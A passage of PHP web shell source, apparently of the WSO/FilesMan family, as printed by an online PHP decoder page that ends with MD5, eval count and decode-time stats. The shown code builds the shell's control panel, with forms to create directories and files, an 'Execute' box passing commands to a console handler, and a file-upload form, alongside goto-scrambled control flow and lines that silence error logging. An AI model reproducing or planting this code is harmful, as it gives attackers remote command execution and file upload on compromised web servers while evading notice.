file:</span><br><input class='toolsInp' type=text name=f><input
type=submit value='>>'></form>
</td>\r\n\t</tr>
<tr>\r\n\t\t<td>
<form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\">
<span>Make dir:</span>{$is_writable}<br><input class='toolsInp'
type=text name=d><input type=submit value='>>'></form>
</td>\r\n\t\t<td>
<form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\">
<span>Make file:</span>{$is_writable}<br><input class='toolsInp'
type=text name=f><input type=submit value='>>'></form>
</td>\r\n\t</tr>
<tr>\r\n\t\t<td>
<form onsubmit=\"g('Console',null,this.c.value);return false;\">
<span>Execute:</span><br><input class='toolsInp' type=text name=c
value=''><input type=submit value='>>'></form>
</td>\r\n\t\t<td>
<form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden
name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c
value='" . $GLOBALS[' cwd']
. "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='"
. (isset($_POST['charset']) ? $_POST['charset'] : '' )
. "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>"
; } goto E39a8; B2753: function XCOPhViewSize($s) { if (is_int($s))
{ $s=sprintf("%u", $s); } if ($s>= 1073741824) { return
sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; }
} goto e7b25; E8593: $safe_mode = @ini_get('safe_mode'); goto Ed7d4;
Aaf31: $cwd = @getcwd(); goto A54db; E7176: @ini_set('error_log', NULL);
goto dc87f; b936e: exit;
Function Calls
None |
Stats
MD5 | b342be2dffc19452e0e22ac0bbf36993 |
Eval Count | 0 |
Decode Time | 121 ms |